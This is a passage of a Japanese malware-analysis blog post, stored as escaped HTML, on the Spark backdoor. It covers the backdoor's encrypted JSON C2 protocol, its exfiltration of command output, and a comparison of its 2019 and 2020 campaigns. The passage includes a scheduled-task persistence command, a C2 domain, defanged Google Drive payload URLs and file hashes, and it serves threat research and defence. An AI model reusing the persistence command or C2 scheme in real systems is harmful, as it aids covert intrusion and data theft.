KaileeXws\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\u6301\u3064JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u7d50\u679c\u306eJSON\u306f\u3001C2\u306b\u3088\u3063\u3066\u767a\u884c\u3055\u308c\u305f'whoami'\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u304c\"test-system\\<redacted>\"\u3067\u3042\u308b\u5834\u5408\u306f\u3001\u6b21\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n
      {\"Zeke\":[{\"FrederickT\":\"5yUu16Ae8WKt<redacted>\",\"KaileeXws\":true,\"ReesefP\":5}]}<\/span><\/p>\n
      \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u3053\u306e\u30c7\u30fc\u30bf\u3092base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3057\u3001\u6b21\u306e\u3088\u3046\u306b\u30a2\u30a6\u30c8\u30d0\u30f3\u30c9JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u5185\u306e\"CallieVK\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\u8a2d\u5b9a\u3057\u3001\"ReeceWNM\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\"Winston\"\u901a\u4fe1\u30bf\u30a4\u30d7\u306b\u8a2d\u5b9a\u3057\u307e\u3059\u3002<\/p>\n
      {\"CallieVK\":\"eyJaZWtlIjpbeyJGcmVkZXJpY2tUIjoiNXlVdTE2QWU4V0t0aX<redacted>0iLCJLYWlsZWVYd3MiOnRydWUsIlJlZXNlZlAiOjV9XX0=\",\"ReeceWNM\":\"Winston\"}<\/span><\/p>\n
      \u6b21\u306b\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u3053\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u6697\u53f7\u5316\u3057\u3066C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3057\u3001\u3053\u306e\u767a\u884c\u3057\u305f\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092\u76d7\u307f\u51fa\u3057\u307e\u3059\u3002\u56f312\u306f\u3001\"Winston\"\u901a\u4fe1\u30bf\u30a4\u30d7\u3092\u542b\u3080\u6697\u53f7\u5316\u3055\u308c\u305fJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u542b\u307e\u308c\u305fHTTP POST\u8981\u6c42\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n
      \"Figure<\/span><\/p>\n
      \u56f312. \u767a\u884c\u3057\u305f\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3059\u308b\u30da\u30a4\u30ed\u30fc\u30c9<\/span><\/p>\n
      \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u6700\u521d\u306e\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092\u9001\u4fe1\u3057\u305f\u5f8c\u3001C2\u304c\u3001\"{\"Garrison\" : 8}\"\u306a\u3069\u3001\"Garrison\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u6570\u5024\u3092\u8a2d\u5b9a\u3057\u305fJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3067\u5fdc\u7b54\u3059\u308b\u3053\u3068\u3092\u671f\u5f85\u3057\u307e\u3059\u3002\u56f313\u306f\u3001C2\u30b5\u30fc\u30d0\u30fc\u306e\u3001\"Garrison\"\u30d5\u30a3\u30fc\u30eb\u30c9\u304c\u542b\u307e\u308c\u305fJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u6697\u53f7\u5316\u30c6\u30ad\u30b9\u30c8\u3067\u306e\u5fdc\u7b54\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n
      \"Figure<\/span><\/p>\n
      \u56f313. Garrison JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u9001\u4fe1\u3059\u308bC2\u30b5\u30fc\u30d0\u30fc<\/span><\/p>\n
      \u3053\u308c\u306f\u3001C2\u306e\u30c1\u30a7\u30c3\u30af\u30a4\u30f3\u304a\u3088\u3073\u6700\u521d\u306e\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u90e8\u5206\u3092\u7d42\u7d50\u3055\u305b\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u7d99\u7d9a\u7684\u306bHTTP\u8981\u6c42\u3092\u9001\u4fe1\u3059\u308b\u30eb\u30fc\u30d7\u306b\u5165\u308a\u307e\u3059\u3002\u3053\u306e\u8981\u6c42\u306f\u3001\u4ee5\u524d\u8aac\u660e\u3057\u305fJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u540c\u3058\u30b7\u30fc\u30b1\u30f3\u30b9\u3092\u4f7f\u7528\u3057\u3066\u5b9f\u884c\u3059\u308b\u8ffd\u52a0\u306e\u30b3\u30de\u30f3\u30c9\u3092\u53d6\u5f97\u3059\u308b\u305f\u3081\u306e\u3082\u306e\u3067\u3059\u3002\u3053\u308c\u306f\u3001C2\u306b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u9001\u4fe1\u3057\u305f\"JoslynKe\"\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\u5f8c\u304b\u3089\u59cb\u307e\u308a\u307e\u3059\u3002C2\u306b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u9001\u4fe1\u3057\u3066\u305d\u306e\u5fdc\u7b54\u3092\u89e3\u6790\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u53d6\u5f97\u3059\u308b\u4ee3\u308f\u308a\u306b\u3001\u3053\u306e\u30eb\u30fc\u30d7\u306e\u5404\u7e70\u308a\u8fd4\u3057\u306f\u3001\u3053\u3053\u3067\u793a\u3055\u308c\u305f\"VanessaFM\"\u306e\u901a\u4fe1\u30bf\u30a4\u30d7\u3067\u59cb\u307e\u308a\u307e\u3059\u3002<\/p>\n
      {\"CallieVK\":\"eyJBZGVsaW5lUkQiOiJ2Y0picTZuemdKaz0iLCJBdmVyaXp0IjoiMSIsIkJyYW5kZW50bEsiOjEsIk1hdGhpYXNOYm8iOlt7IkFkYWx5bm5nUyI6MSwiQ29sbGluc1BNIjoiS1Q2TloyMVNGTVQ5WHFuZVM3MjJmZkVucG1FUFVZcDBqcDFFTXRaVEtyUmNNWkVFWG56QnZnPT0iLCJOZXZhZWgiOnRydWV9XX0=\",\"ReeceWNM\":\"VanessaFM\"}<\/span><\/p>\n
      \"CallieVK\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u30c7\u30fc\u30bf\u306f\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u3001\u3044\u304f\u3064\u304b\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\u6301\u3064JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u306a\u308a\u307e\u3059\u3002\u305d\u306e1\u3064\u306f\u3001\"MathiasNbo\"\u3068\u547c\u3070\u308c\u308b\u914d\u5217\u3067\u3042\u308a\u3001\u305d\u308c\u306b\u306f\u3001\u4fb5\u5bb3\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u306eUUID\u3092\u9001\u4fe1\u3059\u308bJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u3001\"CollinsPM\"\u3068\u3044\u3046\u540d\u524d\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u306f\u3001\u524d\u306b\"JoslynKe\"\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\"ZaydenlnL\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3067C2\u306b\u9001\u4fe1\u3055\u308c\u305f\u3082\u306e\u3067\u3059\u3002\u3053\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u306f\u3001\u30cb\u30c3\u30af\u30cd\u30fc\u30e0\u307e\u305f\u306f\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u8b58\u5225\u5b50\u5024\u304cbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306e\u5f62\u5f0f\u3067\u542b\u307e\u308c\u305f\"AdelineRD\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u79c1\u305f\u3061\u306f\u3001\u65e2\u77e5\u306eSpark\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3 \u30b3\u30fc\u30c9\u306e\u30ea\u30b9\u30c8\u3092\u307e\u3068\u3081\u3001\u4ed8\u9332\u306b\u8a18\u8f09\u3057\u307e\u3057\u305f\u3002\u7d50\u679c\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u3082\u306e\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n
      {\"AdelineRD\":\"vcJbq6nzgJk=\",\"Averizt\":\"1\u2033,\"BrandentlK\":1,\"MathiasNbo\":[{\"AdalynngS\":1,\"CollinsPM\":\"\"<base64 encoded ciphertext of UUID seen in ZaydenlnL field>\",\"Nevaeh\":true}]}<\/span><\/p>\n
      \u3053\u306eJSON\u306f\u3001\u56f314\u306e\u3088\u3046\u306b\u6697\u53f7\u5316\u3055\u308c\u3066base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u3001C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30e1\u30a4\u30f3 \u30eb\u30fc\u30d7\u306e\u7e70\u308a\u8fd4\u3057\u3054\u3068\u306b\u540c\u3058JSON\u3092\u4f7f\u7528\u3057\u3001C2\u304b\u3089\u3001\"Jordanlzw\"\u3001\"Allier\"\u3001\u304a\u3088\u3073\"Garrison\"\u306e\u5404\u30d5\u30a3\u30fc\u30eb\u30c9\u304c\u542b\u307e\u308c\u305f\u524d\u8ff0\u3068\u540c\u3058\u30b7\u30fc\u30b1\u30f3\u30b9\u306e\u5fdc\u7b54\u304c\u63d0\u4f9b\u3055\u308c\u3001\u8ffd\u52a0\u306e\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3059\u308b\u3053\u3068\u3092\u671f\u5f85\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n
      \"Figure<\/span><\/p>\n
      \u56f314. \u8ffd\u52a0\u306e\u30b3\u30de\u30f3\u30c9\u3092\u8981\u6c42\u3059\u308bHTTP POST\u3092C2\u30b5\u30fc\u30d0\u30fc\u306b\u767a\u884c\u3059\u308b\u30da\u30a4\u30ed\u30fc\u30c9<\/span><\/p>\n
      <\/a>2019\u5e74\u30682020\u5e74\u3068\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u6bd4\u8f03<\/h2>\n
      \u8ffd\u52a0\u306eSpark\u30b5\u30f3\u30d7\u30eb\u3092\u53ce\u96c6\u3057\u306a\u304c\u3089\u3001\u79c1\u305f\u3061\u306f\u30012019\u5e74\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3<\/a>\u306e\u30b5\u30f3\u30d7\u30eb\u3068Spark\u30ad\u30e3\u30f3\u30da\u30fc\u30f3<\/a>\u3067\u4f7f\u7528\u3055\u308c\u305f2020\u5e741\u6708\u306b\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305f\u65b0\u3057\u3044\u30b5\u30f3\u30d7\u30eb\u3092\u898b\u3064\u3051\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u4f7f\u7528\u3055\u308c\u305f\u914d\u4fe1\u6587\u66f8\u3068Spark\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u30012019\u5e74\u306e10\u6708\u306811\u6708\u306e\u653b\u6483\u3067\u89b3\u6e2c\u3055\u308c\u305f\u914d\u4fe1\u6587\u66f8\u3068\u306f\u7570\u306a\u308a\u307e\u3059\u3002\u5927\u307e\u304b\u306b\u8a00\u3048\u3070\u30012019\u5e741\u6708\u306e\u914d\u4fe1\u6587\u66f8\u306f\u5185\u90e8\u306b\u305d\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u57cb\u3081\u8fbc\u307e\u308c\u3066\u3044\u308b\u81ea\u5df1\u5145\u8db3\u578b\u3067\u3057\u305f\u304c\u30012019\u5e74\u306e10\u6708\u306811\u6708\u304a\u3088\u30732020\u5e741\u6708\u306e\u914d\u4fe1\u6587\u66f8\u306f\u3001\u30ea\u30e2\u30fc\u30c8 \u30b5\u30fc\u30d0\u30fc\u3068\u306e\u5bfe\u8a71\u3092\u5fc5\u8981\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u30022019\u5e7410\u6708\u306e\u6587\u66f8\u30682020\u5e741\u6708\u306e\u6587\u66f8\u306e\u76f8\u9055\u306f\u3001\u524d\u8005\u306f\u653b\u6483\u8005\u304c\u5236\u5fa1\u3059\u308b\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308bVBScript\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u308b\u306e\u306b\u5bfe\u3057\u3066\u30012020\u5e741\u6708\u306e\u6587\u66f8\u306fGoogle\u30c9\u30e9\u30a4\u30d6\u304b\u3089\u30ea\u30e2\u30fc\u30c8 \u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u30ed\u30fc\u30c9\u3057\u3066\u3001\u305d\u306e\u30de\u30af\u30ed\u304cGoogle\u30c9\u30e9\u30a4\u30d6\u304b\u3089\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u308b\u3068\u3044\u3046\u70b9\u3067\u3059\u3002\u3053\u308c\u3089\u306e\u914d\u4fe1\u6587\u66f8\u305d\u308c\u305e\u308c\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u308b\u65e2\u77e5\u306eSpark\u30da\u30a4\u30ed\u30fc\u30c9\u3082\u7570\u306a\u3063\u3066\u304a\u308a\u3001\u79c1\u305f\u3061\u306f\u3053\u308c\u3092\u3053\u306e\u30d6\u30ed\u30b0\u3067\u524d\u8ff0\u3057\u305f11\u6708\u306e\u653b\u6483\u3067\u306e\u65e2\u77e5\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u6bd4\u8f03\u3057\u307e\u3059\u3002<\/p>\n
      2019\u5e74\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u914d\u4fe1\u6587\u66f8\u3092\u89e3\u6790\u3057\u305f\u3068\u3053\u308d\u3001\u305d\u308c\u306f\u30de\u30af\u30ed\u3092\u6709\u52b9\u5316\u3057\u305fWord\u6587\u66f8(SHA256:40b7a1e8c00deb6d26f28bbdd3e9abe0a483873a4a530742bb65faace89ffd11)\u3067\u3042\u3063\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u3053\u306e\u30de\u30af\u30ed\u306f\u3001\"Shapes(\"textbox1\").Visible = True\"\u3068\u3044\u3046\u884c\u3067\u6587\u66f8\u5185\u306e\u30c6\u30ad\u30b9\u30c8\u30dc\u30c3\u30af\u30b9\u3092\u53ef\u8996\u306b\u8a2d\u5b9a\u3059\u308b\u3053\u3068\u3067\u3001\u304a\u3068\u308a\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u4f5c\u6210\u3057\u307e\u3057\u305f\u304c\u3001\u3053\u306e\u30d6\u30ed\u30b0\u3067\u524d\u8ff0\u3057\u305f\u653b\u6483\u3067\u306f\u66f4\u65b0\u3055\u308c\u305f\u304a\u3068\u308a\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u8868\u793a\u3059\u308b\u8a66\u307f\u306f\u3042\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3082\u30461\u3064\u306e\u8457\u3057\u3044\u9055\u3044\u306f\u30012019\u5e74\u306e1\u6708\u306810\u6708\u306e\u914d\u4fe1\u6587\u66f8\u306f\u3069\u3061\u3089\u3082\u3001\u305d\u308c\u305e\u308c2\u756a\u76ee\u306eVBScript %userprofile%\\wmsetup.vbs\u3068programdata\\Micorsoft\\Microsoft.vbs\u306b\u66f8\u304d\u8fbc\u307f\u307e\u3057\u305f\u304c\u3001wmsetup.vbs\u30b9\u30af\u30ea\u30d7\u30c8\u306b\u306f\u30d0\u30a4\u30ca\u30ea \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u542b\u307e\u308c\u308b\u306e\u306b\u5bfe\u3057\u3001Microsoft.vbs\u306f\u30d0\u30a4\u30ca\u30ea \u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u3082\u30461\u3064\u306eVBScript\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u308b\u3053\u3068\u3067\u3059\u3002wmsetup.vbs\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u3001\u57cb\u3081\u8fbc\u307e\u308c\u305fbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9(SHA256:9511940ed52775aef969fba004678f4c142b33e2dd631a0e8f4e536ab0b811db<\/p>\n
      )\u3092\u30c7\u30b3\u30fc\u30c9\u3057\u3001\u305d\u308c\u3092%temp%\\ihelp.exe\u306b\u4fdd\u5b58\u3057\u3001\u4ee5\u4e0b\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u3067\u3001\u6c38\u7d9a\u5316\u3059\u308b\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002<\/p>\n
      schtasks \/create \/f \/sc minute \/mo 1 \/tn ihelp \/tr %temp%\\ihelp.exe<\/span><\/p>\n
      2019\u5e741\u6708\u306b\u914d\u5e03\u3055\u308c\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u3044\u304f\u3064\u304b\u306e\u6ce8\u76ee\u306b\u5024\u3059\u308b\u7279\u5fb4\u3068\u3057\u3066\u306f\u3001\u4ed6\u306e\u65e2\u77e5\u306e\u30b5\u30f3\u30d7\u30eb\u304b\u3089\u81ea\u7531\u306b\u4f7f\u7528\u3067\u304d\u308b\u3055\u307e\u3056\u307e\u306a\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u304c\u6319\u3052\u3089\u308c\u307e\u3059\u3002JSON\u306e\u4ee3\u308f\u308a\u306bmsgpackv1<\/a>\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u3066\u305d\u306e\u69cb\u6210\u3068C2\u901a\u4fe1\u3092\u69cb\u7bc9\u3057\u305f\u308a\u3001cURL\u306e\u4ee3\u308f\u308a\u306bSFML<\/a>\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3059\u308b\u306a\u3069\u3067\u3059\u3002\u307e\u305f\u30012019\u5e7411\u6708\u306b\u914d\u5e03\u3055\u308c\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u306f\u7570\u306a\u308a\u3001\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001AES\u6697\u53f7\u3092\u4f7f\u7528\u3057\u3066\u3001\u305d\u306e\u69cb\u6210\u304a\u3088\u3073\u4ed6\u306e\u95a2\u9023\u6587\u5b57\u5217\u3092\u5fa9\u53f7\u3057\u305f\u308a\u3001\u305d\u306eC2\u3068\u306e\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u901a\u4fe1\u3092\u6697\u53f7\u5316\u304a\u3088\u3073\u5fa9\u53f7\u3057\u307e\u3059\u3002\u3053\u306e\u30d6\u30ed\u30b0\u3067\u524d\u8ff0\u3057\u305f\u3088\u3046\u306b\u30ad\u30fc\u3068\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306b\u5bfe\u3057\u3066\u30ab\u30b9\u30bf\u30e0\u306erolling XOR\u6697\u53f7\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u306a\u304f\u3001\u63d0\u4f9b\u3055\u308c\u305f\u30ad\u30fc\u6587\u5b57\u5217\u306eSHA256\u30cf\u30c3\u30b7\u30e5\u5168\u4f53\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002msgpack\u3092\u4f7f\u7528\u3057\u3066\u69cb\u9020\u5316\u3055\u308c\u305f\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089\u5fa9\u53f7\u3055\u308c\u305f\u69cb\u6210\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u3082\u306e\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n
      \\x88\\xa4jevG\\xadsmartweb9[.]com\\xa3JRk\\xa1\/\\xa3ufRP\\xa4qNxp\\x00\\xa4kfds\\xa0\\xa4WjaS\\x01\\xa3WnF\\xb8OMfX5GiCmOICUvhunB2lWQ==\\xa3sRF\\xcd'\\x10<\/span><\/p>\n
      \u307e\u305f\u30012020\u5e74\u306eSpark\u30ad\u30e3\u30f3\u30da\u30fc\u30f3(SHA256:8c0966c9518a7ec5bd1ed969222b2bcf9420295450b7ed2f45972e766d26ded8)\u306e\u914d\u4fe1\u6587\u66f8\u3092\u89e3\u6790\u3057\u305f\u3068\u3053\u308d\u3001\u305d\u308c\u306f2019\u5e74\u306e1\u6708\u306810\u6708\u306e\u3069\u3061\u3089\u306e\u914d\u4fe1\u6587\u66f8\u3068\u3082\u7570\u306a\u308a\u307e\u3057\u305f\u3002\u307e\u305a\u3001\u6700\u521d\u306e\u914d\u4fe1\u6587\u66f8\u306f\u3001\u30de\u30af\u30ed\u304c\u542b\u307e\u308c\u3066\u304a\u3089\u305a\u3001Google\u30c9\u30e9\u30a4\u30d6\u3001\u5177\u4f53\u7684\u306b\u306f\u4ee5\u4e0b\u306eURL\u304b\u3089\u306e\u30ea\u30e2\u30fc\u30c8 \u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306e\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u307e\u3059\u3002<\/p>\n
      hxxps:\/\/drive.google.com\/uc?export=download&d=1NbCEnL-jA89PWBEhLWwHmBM5nmUKNRS8<\/span><\/p>\n
      \u30ea\u30e2\u30fc\u30c8 \u30c6\u30f3\u30d7\u30ec\u30fc\u30c8(SHA256:a0ae5cc0659693e4c49d3597d5191923fcfb54040b9b5c8229e4c46b9330c367)\u306b\u306f\u3001\u4ee5\u4e0b\u306eURL\u304b\u3089\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u308b\u30de\u30af\u30ed\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n
      hxxs:\/\/drive.google.com\/uc?export=download&id=1yiDnuLRfQTBdak6S8gKnJLEzMk3yvepH<\/span><\/p>\n
      Google\u30c9\u30e9\u30a4\u30d6 \u30ea\u30f3\u30af(SHA256:7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128)\u3067\u30db\u30b9\u30c8\u3055\u308c\u305f\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306f\u3001\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3042\u308a\u3001%userprofile%\\runawy.exe\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3092\u8a66\u307f\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u3053\u306e\u30d6\u30ed\u30b0\u3067\u524d\u8ff0\u3057\u305f\"attachment.doc\"\u914d\u4fe1\u6587\u66f8\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305f\u3053\u3068\u304c\u89b3\u6e2c\u3055\u308c\u305f\u3082\u306e\u3068\u307e\u3063\u305f\u304f\u540c\u3058\u30c9\u30ed\u30c3\u30d1\u304a\u3088\u3073\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u3059\u3002<\/p>\n
      \u88686\u306f\u3001\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u8aac\u660e\u3057\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u6a5f\u80fd\u306e\u6bd4\u8f03\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u6b8b\u5ff5\u306a\u304c\u3089\u3001\u79c1\u305f\u3061\u306f\u30012019\u5e7410\u6708\u306e\u653b\u6483\u3067\u914d\u5e03\u3055\u308c\u305fMOFA\u95a2\u9023\u306eWord\u6587\u66f8\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u53d6\u5f97\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u30022019\u5e741\u6708\u30682020\u5e74\u306e\u914d\u4fe1\u6587\u66f8\u3067\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305fSpark\u30b5\u30f3\u30d7\u30eb\u3092\u30012019\u5e7411\u6708\u306ePictures.pdf\u914d\u4fe1\u6587\u66f8\u3067\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305fSpark\u30b5\u30f3\u30d7\u30eb\u3068\u6bd4\u8f03\u3059\u308b\u3068\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304c\u7d99\u7d9a\u7684\u306b\u3053\u306e\u30d0\u30c3\u30af\u30c9\u30a2\u3092\u958b\u767a\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u5506\u3059\u308b\u6ce8\u76ee\u306b\u5024\u3059\u308b\u76f8\u9055\u304c\u8a8d\u3081\u3089\u308c\u307e\u3059\u3002<\/p>\n\n\n\n\n\n\n\n\n\n\n
      \u6a5f\u80fd<\/strong><\/td>\n2019\u5e741\u6708\u306eSpark<\/strong><\/td>\n2019\u5e7411\u6708\u306eSpark (Pictures.pdf)<\/strong><\/td>\n2019\u5e7410\u6708\u306811\u6708\u306e\"attachment.doc\"\u30682020\u5e741\u6708\u306e\"Spark\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\"<\/strong><\/td>\n<\/tr>\n
      \u30c9\u30ed\u30c3\u30d1<\/td>\n\u306a\u3057<\/td>\n\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8<\/td>\n\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8<\/td>\n<\/tr>\n
      HTTP\u30e9\u30a4\u30d6\u30e9\u30ea<\/td>\nSFML<\/a><\/td>\ncURL 7.56.0-DEV<\/a><\/td>\nelnormous' HTTPRequest<\/a><\/td>\n<\/tr>\n
      \u69cb\u6210\u69cb\u9020<\/td>\nmsgpack\u30d0\u30fc\u30b8\u30e7\u30f31<\/a><\/td>\nJSON for Modern C++ v2.1.1<\/a><\/td>\nJSON for Modern C++ v3.7.0<\/a><\/td>\n<\/tr>\n
      \u30da\u30a4\u30ed\u30fc\u30c9 \u30d1\u30c3\u30ab\u30fc<\/td>\nEnigma Virtual Box<\/td>\nEnigma (5.X)<\/td>\nEnigma (5.X)<\/td>\n<\/tr>\n
      \u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u6697\u53f7<\/td>\n\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306b\u5bfe\u3059\u308bAES<\/td>\n\u30ad\u30fc\u304a\u3088\u3073\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306b\u5bfe\u3059\u308brolling XOR\u3068\u3001\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306b\u5bfe\u3059\u308b3DES<\/td>\n\u30ad\u30fc\u304a\u3088\u3073\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306b\u5bfe\u3059\u308brolling XOR\u3068\u300116\u30d0\u30a4\u30c8\u306e\u30c1\u30e3\u30f3\u30af\u306e\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u3092\u5fa9\u53f7\u3059\u308b\u30ab\u30b9\u30bf\u30e0AES<\/td>\n<\/tr>\n
